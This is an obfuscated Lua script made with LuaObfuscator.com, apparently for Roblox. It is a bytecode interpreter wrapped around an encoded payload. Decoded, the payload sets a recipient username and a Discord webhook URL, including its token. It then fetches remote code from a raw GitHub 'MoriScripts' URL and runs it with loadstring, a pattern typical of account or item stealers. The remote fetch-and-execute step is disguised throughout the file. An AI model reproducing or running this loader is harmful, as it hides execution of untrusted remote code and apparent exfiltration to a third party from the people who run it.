--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0;local v32;while true do if (v31==(2 -1)) then return v32;end if ((0 -0)==v31) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=2 -1 ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (621 -(555 + 64)) ;return (v34 * 256) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=928 -(214 + 713) ;local v38=(v21(v36,(2 -1) + 0 ,4 + 16 ) * ((879 -(282 + 595))^(1669 -(1121 + 402 + 114)))) + v35 ;local v39=v21(v36,19 + 2 ,43 -12 );local v40=((v21(v36,1097 -((270 -202) + (1949 -(802 + 150))) )==(1271 -((608 -382) + 1044))) and  -1) or (4 -3) ;if (v39==(117 -(32 + 85))) then if (v38==(0 + 0)) then return v40 * (0 + 0) ;else v39=(1737 -779) -(650 + 242 + 65) ;v37=0 -0 ;end elseif (v39==(3783 -1736)) then return ((v38==(0 -0)) and (v40 * (1/((1347 -(915 + 82)) -(87 + 263))))) or (v40 * NaN) ;end return v8(v40,v39-(1203 -(67 + 113)) ) * (v37 + (v38/(2^(39 + 13)))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(0 -0)) then return "";end end v42=v3(v16,v19,(v19 + v41) -(1 + 0) );v19=v19 + v41 ;local v43={};for v67=1 -0 , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v44~=(7 -3)) then else while true do if (v45~=(1 -0)) then else local v97=0;while true do if (v97==0) then v48=nil;v49=nil;v97=1 -0 ;end if (v97==(1 + 0)) then v45=4 -2 ;break;end end end if (v45~=(1253 -(721 + 530))) then else v50=nil;v51=nil;v45=1274 -(945 + 326) ;end if (v45==0) then local v98=0;while true do if (v98~=1) then else v45=1;break;end if (v98==0) then v46=0;v47=nil;v98=2 -1 ;end end end if (v45==(3 + 0)) then v52=nil;while true do local v99=700 -(271 + 429) ;local v100;while true do if (v99==0) then v100=0 + 0 ;while true do if (v100==(1501 -(1408 + 92))) then if (v46~=(1087 -(461 + 625))) then else local v139=1288 -(993 + 295) ;while true do if (v139~=(0 + 0)) then else v51=v24();v52={};v139=1;end if (v139~=(1172 -(418 + 753))) then else for v168=1 + 0 ,v51 do local v169=0 + 0 ;local v170;local v171;while true do if (v169~=1) then else if (v170==(1 + 0)) then v171=v22()~=(0 + 0) ;elseif (v170==(531 -(406 + 123))) then v171=v25();elseif (v170==(1772 -(1749 + 20))) then v171=v26();end v52[v168]=v171;break;end if (v169~=0) then else local v173=0 + 0 ;local v174;while true do if (v173==0) then v174=1322 -(1249 + 73) ;while true do if (v174==(1 + 0)) then v169=1;break;end if (v174~=(1145 -(466 + 679))) then else v170=v22();v171=nil;v174=1;end end break;end end end end end v50[6 -3 ]=v22();v139=2;end if (v139==2) then v46=2;break;end end end break;end if (v100~=0) then else local v119=0;while true do if (v119~=(0 -0)) then else if (v46==0) then local v164=1900 -(106 + 1794) ;local v165;while true do if (v164~=0) then else v165=0 + 0 ;while true do if ((1 + 1)~=v165) then else v46=1;break;end if (0==v165) then local v176=0 -0 ;while true do if (0==v176) then v47={};v48={};v176=2 -1 ;end if (v176==1) then v165=1;break;end end end if (v165==(115 -(4 + 110))) then local v177=0;while true do if (1~=v177) then else v165=586 -(57 + 527) ;break;end if (v177~=(1427 -(41 + 1386))) then else v49={};v50={v47,v48,nil,v49};v177=1;end end end end break;end end end if (v46==(5 -3)) then local v166=166 -(122 + 44) ;local v167;while true do if (v166~=0) then else v167=0 -0 ;while true do local v175=0;while true do if (0==v175) then if (v167==(0 -0)) then local v178=0;while true do if (v178~=1) then else v167=1 + 0 ;break;end if (v178~=0) then else for v179=1 + 0 ,v24() do local v180=0;local v181;local v182;local v183;while true do if (v180==(1 -0)) then v183=nil;while true do if ((66 -(30 + 35))~=v181) then else while true do if (v182==0) then v183=v22();if (v21(v183,1 + 0 ,1258 -(1043 + 214) )~=(0 -0)) then else local v187=1212 -(323 + 889) ;local v188;local v189;local v190;local v191;local v192;local v193;while true do if (v187~=(5 -3)) then else v192=nil;v193=nil;v187=583 -(361 + 219) ;end if ((320 -(53 + 267))~=v187) then else v188=0;v189=nil;v187=1;end if (v187~=3) then else while true do if (1==v188) then local v194=0 + 0 ;while true do if (v194==1) then v188=415 -(15 + 398) ;break;end if (v194~=(982 -(18 + 964))) then else v191=nil;v192=nil;v194=3 -2 ;end end end if (v188==(2 + 0)) then v193=nil;while true do if (v189==(1 + 0)) then v192=nil;v193=nil;v189=2;end if (v189==2) then while true do if (0~=v190) then else local v198=850 -(20 + 830) ;while true do if (v198==0) then local v205=0 + 0 ;while true do if (v205~=0) then else local v211=0;while true do if (v211==(127 -(116 + 10))) then v205=1;break;end if (v211~=(0 + 0)) then else v191=v21(v183,740 -(542 + 196) ,6 -3 );v192=v21(v183,4,2 + 4 );v211=1;end end end if (v205~=1) then else v198=1 + 0 ;break;end end end if (v198~=(1 + 0)) then else v190=1;break;end end end if ((4 -2)==v190) then local v199=0 -0 ;local v200;while true do if (v199~=0) then else v200=1551 -(1126 + 425) ;while true do if (v200==(406 -(118 + 287))) then v190=3;break;end if (v200==(0 -0)) then local v212=0;while true do if (v212==0) then if (v21(v192,1122 -(118 + 1003) ,1)~=1) then else v193[5 -3 ]=v52[v193[379 -(142 + 235) ]];end if (v21(v192,2,9 -7 )~=(1 + 0)) then else v193[3]=v52[v193[3]];end v212=1;end if (v212~=1) then else v200=978 -(553 + 424) ;break;end end end end break;end end end if (v190==(5 -2)) then if (v21(v192,3,3)~=1) then else v193[4 + 0 ]=v52[v193[4 + 0 ]];end v47[v179]=v193;break;end if (v190~=(1 + 0)) then else local v202=0 + 0 ;while true do if (v202~=1) then else v190=2 + 0 ;break;end if (v202~=0) then else v193={v23(),v23(),nil,nil};if (v191==(0 + 0)) then local v207=0;local v208;local v209;local v210;while true do if (v207~=(0 -0)) then else v208=753 -(239 + 514) ;v209=nil;v207=1 + 0 ;end if (v207==1) then v210=nil;while true do if (v208~=(1329 -(797 + 532))) then else local v219=0;while true do if (v219~=(1 + 0)) then else v208=1 + 0 ;break;end if (v219~=(0 -0)) then else v209=1202 -(373 + 829) ;v210=nil;v219=1;end end end if (v208==(732 -(476 + 255))) then while true do if (v209~=0) then else v210=0;while true do if (v210==0) then v193[3]=v23();v193[1134 -(369 + 761) ]=v23();break;end end break;end end break;end end break;end end elseif (v191==(1 + 0)) then v193[3]=v24();elseif (v191==2) then v193[3]=v24() -(2^(28 -12)) ;elseif (v191~=3) then else local v220=0 -0 ;local v221;local v222;local v223;while true do if (v220~=0) then else v221=0;v222=nil;v220=1;end if (v220==(239 -(64 + 174))) then v223=nil;while true do if (v221~=(0 + 0)) then else local v226=0 -0 ;while true do if (v226==0) then v222=336 -(144 + 192) ;v223=nil;v226=217 -(42 + 174) ;end if (v226~=1) then else v221=1 + 0 ;break;end end end if (v221==1) then while true do if (0==v222) then v223=0 + 0 ;while true do if (v223~=0) then else v193[2 + 1 ]=v24() -((1506 -(363 + 1141))^16) ;v193[4]=v23();break;end end break;end end break;end end break;end end end v202=1;end end end end break;end if (v189==0) then local v196=0;local v197;while true do if ((1580 -(1183 + 397))~=v196) then else v197=0 -0 ;while true do if (v197~=1) then else v189=1;break;end if (v197~=0) then else local v206=0 + 0 ;while true do if (v206==0) then v190=0;v191=nil;v206=1 + 0 ;end if (v206~=1) then else v197=1976 -(1913 + 62) ;break;end end end end break;end end end end break;end if (v188~=0) then else local v195=0 + 0 ;while true do if ((0 -0)~=v195) then else v189=1933 -(565 + 1368) ;v190=nil;v195=3 -2 ;end if (v195==1) then v188=1662 -(1477 + 184) ;break;end end end end break;end if (v187~=1) then else v190=nil;v191=nil;v187=2;end end end break;end end break;end if (v181~=0) then else local v186=0 -0 ;while true do if (v186~=1) then else v181=1 + 0 ;break;end if (v186~=(856 -(564 + 292))) then else v182=0;v183=nil;v186=1 -0 ;end end end end break;end if (v180~=0) then else v181=0 -0 ;v182=nil;v180=305 -(244 + 60) ;end end end for v184=1,v24() do v48[v184-1 ]=v29();end v178=1 + 0 ;end end end if (v167~=(477 -(41 + 435))) then else return v50;end break;end end end break;end end end v119=1;end if (1~=v119) then else v100=1;break;end end end end break;end end end break;end end break;end if (v44==1) then v47=nil;v48=nil;v44=1003 -(938 + 63) ;end if ((3 + 0)==v44) then v51=nil;v52=nil;v44=1129 -(936 + 189) ;end if (v44==(0 + 0)) then v45=1613 -(1565 + 48) ;v46=nil;v44=1 + 0 ;end if (v44==(1140 -(782 + 356))) then v49=nil;v50=nil;v44=3;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v83=v2(v0(v53,16));if v20 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v83,v20);v20=nil;v89=1;end end else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + 3 );v19=v19 + (271 -(176 + 91)) ;return (v57 * (43710194 -26932978)) + (v56 * (96587 -(32926 -(157 + 1718)))) + (v55 * ((1094 + 254) -(975 + 117))) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v69=v61;local v70=v62;local v71=v63;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v84=0,v77 do if (v84>=v71) then v75[v84-v71 ]=v76[v84 + 1 ];else v79[v84]=v76[v84 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v85=0;while true do if (v85==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82==1) then local v120=v81[2];local v121,v122=v72(v79[v120](v13(v79,v120 + 1 ,v81[3])));v74=(v122 + v120) -1 ;local v123=0;for v136=v120,v74 do v123=v123 + 1 ;v79[v136]=v121[v123];end else local v124=0;local v125;local v126;while true do if (v124==0) then v125=v81[2];v126=v79[v81[3]];v124=1;end if (v124==1) then v79[v125 + 1 ]=v126;v79[v125]=v126[v81[4]];break;end end end elseif (v82<=3) then v79[v81[2]]=v81[3];elseif (v82>4) then v79[v81[2]]=v60[v81[3]];else local v129=0;while true do if (v129==4) then v73=v81[3];break;end if (v129==0) then v60[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v129=1;end if (3==v129) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v129=4;end if (v129==2) then v60[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v129=3;end if (1==v129) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v129=2;end end end elseif (v82<=8) then if (v82<=6) then local v103;local v104,v105;local v106;local v107;v60[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v107=v81[2];v106=v79[v81[3]];v79[v107 + 1 ]=v106;v79[v107]=v106[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v107=v81[2];v104,v105=v72(v79[v107](v13(v79,v107 + 1 ,v81[3])));v74=(v105 + v107) -1 ;v103=0;for v117=v107,v74 do local v118=0;while true do if (v118==0) then v103=v103 + 1 ;v79[v117]=v104[v103];break;end end end v73=v73 + 1 ;v81=v69[v73];v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];elseif (v82>7) then v60[v81[3]]=v79[v81[2]];else local v132=0;local v133;while true do if (v132==0) then v133=v81[2];v79[v133]=v79[v133](v13(v79,v133 + 1 ,v74));break;end end end elseif (v82<=10) then if (v82==9) then v79[v81[2]]=v81[3]~=0 ;elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>11) then v73=v81[3];else v79[v81[2]]();end v73=v73 + 1 ;break;end if (v85==0) then v81=v69[v73];v82=v81[1];v85=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v86=(440 -(382 + 58)) -0 ;local v87;while true do if (v86==(0 -0)) then v87=(v64/((6 -4)^(v65-(3 -2))))%((1191 -(449 + 740))^(((v66-(1019 -(697 + (1029 -708)))) -(v65-1)) + ((726 + 147) -(826 + 46)))) ;return v87-(v87%(2 -1)) ;end end else local v88=((1901 -(260 + 1638)) -1)^(v65-(2 -1)) ;return (((v64%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030E3O00526F6D616E5F3132333534363738030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135323331353330363930382O33323037332F65377363415941327A72414E2D43346A373473484F663437692O7A4471576B34487365366468744339796E5165686A3269635A56342D48565079395A356A4C63534D367800173O0012033O00013O00260A3O000E0001000200040C3O000E0001001203000100043O001206000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100260A3O00010001000100040C3O00010001001203000100043O001204000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100016O00017O00",v9(),...);
